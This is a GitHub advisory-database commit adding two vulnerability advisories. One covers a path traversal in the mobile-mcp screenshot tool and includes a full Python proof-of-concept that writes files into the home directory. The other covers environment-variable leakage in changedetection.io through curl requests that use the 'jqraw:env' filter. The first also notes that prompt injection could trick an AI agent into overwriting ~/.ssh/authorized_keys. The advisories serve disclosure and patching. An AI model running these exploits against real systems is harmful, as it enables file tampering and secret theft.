Skip to content

Commit 11a2b74

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-3p2m-h2v6-g9mx GHSA-58r7-4wr5-hfx8
1 parent 186e586 commit 11a2b74

2 files changed

Lines changed: 134 additions & 0 deletions

File tree

advisories/github-reviewed/2026/03/GHSA-3p2m-h2v6-g9mx/GHSA-3p2m-h2v6-g9mx.json

Lines changed: 66 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,66 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-3p2m-h2v6-g9mx",
4+
"modified": "2026-03-27T19:13:17Z",
5+
"published": "2026-03-27T19:13:17Z",
6+
"aliases": [
7+
"CVE-2026-33989"
8+
],
9+
"summary": "@mobilenext/mobile-mcp alllows arbitrary file write via Path Traversal in mobile screen capture tools",
10+
"details": "### Summary\nThe `@mobilenext/mobile-mcp` server contains a Path Traversal vulnerability in the `mobile_save_screenshot` and `mobile_start_screen_recording` tools. The `saveTo` and `output` parameters were passed directly to filesystem operations without validation, allowing an attacker to write files outside the intended workspace.\n\n### Details\n**File:** `src/server.ts` (lines 584-592)\n\n```typescript\ntool(\n \"mobile_save_screenshot\",\n \"Save Screenshot\",\n \"Save a screenshot of the mobile device to a file\",\n {\n device: z.string().describe(\"The device identifier...\"),\n saveTo: z.string().describe(\"The path to save the screenshot to\"),\n },\n { destructiveHint: true },\n async ({ device, saveTo }) => {\n const robot = getRobotFromDevice(device);\n const screenshot = await robot.getScreenshot();\n fs.writeFileSync(saveTo, screenshot); // ← VULNERABLE: No path validation\n return `Screenshot saved to: ${saveTo}`;\n },\n);\n```\n\n### Root Cause\n\nThe `saveTo` parameter is passed directly to `fs.writeFileSync()` without any validation. The codebase has validation functions for other parameters (`validatePackageName`, `validateLocale` in `src/utils.ts`) but **no path validation function exists**.\n\n### Additional Affected Tool\n\n**File:** `src/server.ts` (lines 597-620)\n\nThe `mobile_start_screen_recording` tool has the same vulnerability in its `output` parameter.\n\n### PoC\n```py\n#!/usr/bin/env python3\n\nimport json\nimport os\nimport subprocess\nimport sys\nimport time\nfrom datetime import datetime\n\nSERVER_CMD = [\"npx\", \"-y\", \"@mobilenext/mobile-mcp@latest\"]\nSTARTUP_DELAY = 4\nREQUEST_DELAY = 0.5\n\n\ndef log(level, msg):\n print(f\"[{level.upper()}] {msg}\")\n\n\ndef send_jsonrpc(proc, msg, timeout=REQUEST_DELAY):\n \"\"\"Send JSON-RPC message and receive response.\"\"\"\n try:\n proc.stdin.write(json.dumps(msg) + \"\\n\")\n proc.stdin.flush()\n time.sleep(timeout)\n line = proc.stdout.readline()\n return json.loads(line) if line else None\n except Exception as e:\n log(\"error\", f\"Communication error: {e}\")\n return None\n\n\ndef send_notification(proc, method, params=None):\n \"\"\"Send JSON-RPC notification (no response expected).\"\"\"\n msg = {\"jsonrpc\": \"2.0\", \"method\": method}\n if params:\n msg[\"params\"] = params\n proc.stdin.write(json.dumps(msg) + \"\\n\")\n proc.stdin.flush()\n\n\ndef start_server():\n \"\"\"Start the mobile-mcp server.\"\"\"\n log(\"info\", \"Starting mobile-mcp server...\")\n\n try:\n proc = subprocess.Popen(\n SERVER_CMD,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n text=True,\n )\n time.sleep(STARTUP_DELAY)\n\n if proc.poll() is not None:\n stderr = proc.stderr.read()\n log(\"error\", f\"Server failed to start: {stderr[:200]}\")\n return None\n\n log(\"info\", f\"Server started (PID: {proc.pid})\")\n return proc\n\n except FileNotFoundError:\n log(\"error\", \"npx not found. Please install Node.js\")\n return None\n\n\ndef initialize_session(proc):\n \"\"\"Initialize MCP session with handshake.\"\"\"\n log(\"info\", \"Initializing MCP session...\")\n\n resp = send_jsonrpc(\n proc,\n {\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"initialize\",\n \"params\": {\n \"protocolVersion\": \"2024-11-05\",\n \"capabilities\": {},\n \"clientInfo\": {\"name\": \"mcpsec-exploit\", \"version\": \"1.0\"},\n },\n },\n )\n\n if not resp or \"error\" in resp:\n log(\"error\", f\"Initialize failed: {resp}\")\n return False\n\n send_notification(proc, \"notifications/initialized\")\n time.sleep(0.5)\n\n server_info = resp.get(\"result\", {}).get(\"serverInfo\", {})\n log(\"info\", f\"Session initialized - Server: {server_info.get('name')} v{server_info.get('version')}\")\n return True\n\n\ndef get_devices(proc):\n \"\"\"Get list of connected devices.\"\"\"\n log(\"info\", \"Enumerating connected devices...\")\n\n resp = send_jsonrpc(\n proc,\n {\n \"jsonrpc\": \"2.0\",\n \"id\": 2,\n \"method\": \"tools/call\",\n \"params\": {\"name\": \"mobile_list_available_devices\", \"arguments\": {}},\n },\n )\n\n if resp:\n content = resp.get(\"result\", {}).get(\"content\", [{}])[0].get(\"text\", \"\")\n try:\n devices = json.loads(content).get(\"devices\", [])\n return devices\n except:\n log(\"warning\", f\"Could not parse device list: {content[:100]}\")\n\n return []\n\n\ndef exploit_path_traversal(proc, device_id, target_path):\n \"\"\"Execute path traversal exploit.\"\"\"\n log(\"info\", f\"Target path: {target_path}\")\n\n resp = send_jsonrpc(\n proc,\n {\n \"jsonrpc\": \"2.0\",\n \"id\": 100,\n \"method\": \"tools/call\",\n \"params\": {\n \"name\": \"mobile_save_screenshot\",\n \"arguments\": {\"device\": device_id, \"saveTo\": target_path},\n },\n },\n timeout=2,\n )\n\n if resp:\n content = resp.get(\"result\", {}).get(\"content\", [{}])\n if isinstance(content, list) and content:\n text = content[0].get(\"text\", \"\")\n log(\"info\", f\"Server response: {text[:100]}\")\n\n check_path = target_path\n if target_path.startswith(\"..\"):\n check_path = os.path.normpath(os.path.join(os.getcwd(), target_path))\n\n if os.path.exists(check_path):\n size = os.path.getsize(check_path)\n log(\"info\", f\"FILE WRITTEN: {check_path} ({size} bytes)\")\n return True, check_path, size\n elif \"Screenshot saved\" in text:\n log(\"info\", f\"Server confirmed write (file may be at relative path)\")\n return True, target_path, 0\n\n log(\"warning\", \"Exploit may have failed or file not accessible\")\n return False, target_path, 0\n\n\ndef main():\n device_id = sys.argv[1] if len(sys.argv) > 1 else None\n\n proc = start_server()\n if not proc:\n sys.exit(1)\n\n try:\n if not initialize_session(proc):\n sys.exit(1)\n\n if not device_id:\n devices = get_devices(proc)\n if devices:\n log(\"info\", f\"Found {len(devices)} device(s):\")\n for d in devices:\n print(f\" - {d.get('id')} - {d.get('name')} ({d.get('platform')}, {d.get('state')})\")\n device_id = devices[0].get(\"id\")\n log(\"info\", f\"Using device: {device_id}\")\n else:\n log(\"error\", \"No devices found. Please connect a device and try again.\")\n log(\"info\", \"Usage: python3 exploit.py <device_id>\")\n sys.exit(1)\n\n home = os.path.expanduser(\"~\")\n\n exploits = [\n \"../../exploit_2_traversal.png\",\n f\"{home}/exploit.png\",\n f\"{home}/.poc_dotfile\",\n ]\n\n results = []\n for target in exploits:\n success, path, size = exploit_path_traversal(proc, device_id, target)\n results.append((target, success, path, size))\n\n finally:\n proc.terminate()\n log(\"info\", \"Server terminated.\")\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n### Impact\nA Prompt Injection attack from a malicious website or document could trick the AI into overwriting sensitive host files (e.g., `~/.bashrc`, `~/.ssh/authorized_keys`, or `.config` files) leading to a broken shell.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "@mobilenext/mobile-mcp"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "0.0.49"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/mobile-next/mobile-mcp/security/advisories/GHSA-3p2m-h2v6-g9mx"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/mobile-next/mobile-mcp/commit/f5e32295903128c1e71cf915ae6c0b76c7b0153b"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/mobile-next/mobile-mcp"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/mobile-next/mobile-mcp/releases/tag/0.0.49"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-22",
59+
"CWE-73"
60+
],
61+
"severity": "HIGH",
62+
"github_reviewed": true,
63+
"github_reviewed_at": "2026-03-27T19:13:17Z",
64+
"nvd_published_at": null
65+
}
66+
}

advisories/github-reviewed/2026/03/GHSA-58r7-4wr5-hfx8/GHSA-58r7-4wr5-hfx8.json

Lines changed: 68 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,68 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-58r7-4wr5-hfx8",
4+
"modified": "2026-03-27T19:11:16Z",
5+
"published": "2026-03-27T19:11:16Z",
6+
"aliases": [
7+
"CVE-2026-33981"
8+
],
9+
"summary": "Changedetection.io Discloses Environment Variables via jq env Builtin in Include Filters",
10+
"details": "### Summary\n\nThe `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container.\n\n### Details\n\n**Vulnerable file:** `changedetectionio/html_tools.py`, lines 380-388\n\nUser-supplied jq filter expressions are compiled and executed without restricting dangerous jq builtins:\n\n```python\nif json_filter.startswith(\"jq:\"):\n jq_expression = jq.compile(json_filter.removeprefix(\"jq:\"))\n match = jq_expression.input(json_data).all()\n return _get_stripped_text_from_json_match(match)\n\nif json_filter.startswith(\"jqraw:\"):\n jq_expression = jq.compile(json_filter.removeprefix(\"jqraw:\"))\n match = jq_expression.input(json_data).all()\n return '\\n'.join(str(item) for item in match)\n```\n\nThe form validator at `forms.py:670-673` only checks that the expression compiles (`jq.compile(input)`) — it does not block dangerous functions. The jq `env` builtin reads all process environment variables regardless of the input data, returning a dictionary of every env var in the server process.\n\n### PoC\n\n**Step 1 — Create a watch for any JSON endpoint with `jqraw:env` as the include filter:**\n\n```bash\ncurl -X POST http://target:5000/api/v1/watch \\\n -H \"Content-Type: application/json\" \\\n -H \"x-api-key: <api-key>\" \\\n -d '{\n \"url\": \"https://httpbin.org/json\",\n \"include_filters\": [\"jqraw:env\"],\n \"time_between_check\": {\"seconds\": 30}\n }'\n```\n\nIf no password or API key is set (the default), no authentication is needed.\n\n**Step 2 — Wait for the watch to be checked, or trigger a recheck:**\n\n```bash\ncurl \"http://target:5000/api/v1/watch/<uuid>?recheck=true\" -H \"x-api-key: <api-key>\"\n```\n\n**Step 3 — The processed text file on disk now contains all environment variables:**\n\n```\n{'SALTED_PASS': '...hashed password...', 'PLAYWRIGHT_DRIVER_URL': 'ws://browser:3000',\n 'HTTP_PROXY': 'socks5h://10.10.1.10:1080', 'SHELL': '/bin/bash',\n 'HOME': '/root', 'PATH': '...', 'WERKZEUG_SERVER_FD': '22',\n ... and all other env vars}\n```\n\nThe data is visible in the web UI when viewing the watch's latest snapshot, and is also included in notification messages if notifications are configured.\n\n**Confirmed on v0.54.6:** The processed text file stored 46 environment variables from the server process.\n\n### Impact\n\n- **Secret exposure:** Leaks `SALTED_PASS` (password hash used for authentication), enabling offline cracking or direct session forgery\n- **Infrastructure credential theft:** Leaks `PLAYWRIGHT_DRIVER_URL`, `WEBDRIVER_URL`, `HTTP_PROXY`/`HTTPS_PROXY`, database connection strings, and any API keys or tokens passed as environment variables\n- **Cascading access:** Leaked proxy credentials or browser automation URLs can be used to pivot into other internal systems\n- **Affects all deployments using jq:** Any instance where the Python `jq` module is installed (standard in Docker deployments) is vulnerable\n- **No authentication required by default:** changedetection.io ships with no password and the API accessible without a key, so this is exploitable by any user with network access in the default configuration",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "changedetection.io"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "0.54.7"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 0.54.6"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8"
45+
},
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f"
49+
},
50+
{
51+
"type": "PACKAGE",
52+
"url": "https://github.com/dgtlmoon/changedetection.io"
53+
},
54+
{
55+
"type": "WEB",
56+
"url": "https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7"
57+
}
58+
],
59+
"database_specific": {
60+
"cwe_ids": [
61+
"CWE-200"
62+
],
63+
"severity": "HIGH",
64+
"github_reviewed": true,
65+
"github_reviewed_at": "2026-03-27T19:11:16Z",
66+
"nvd_published_at": null
67+
}
68+
}

0 commit comments

Comments
 (0)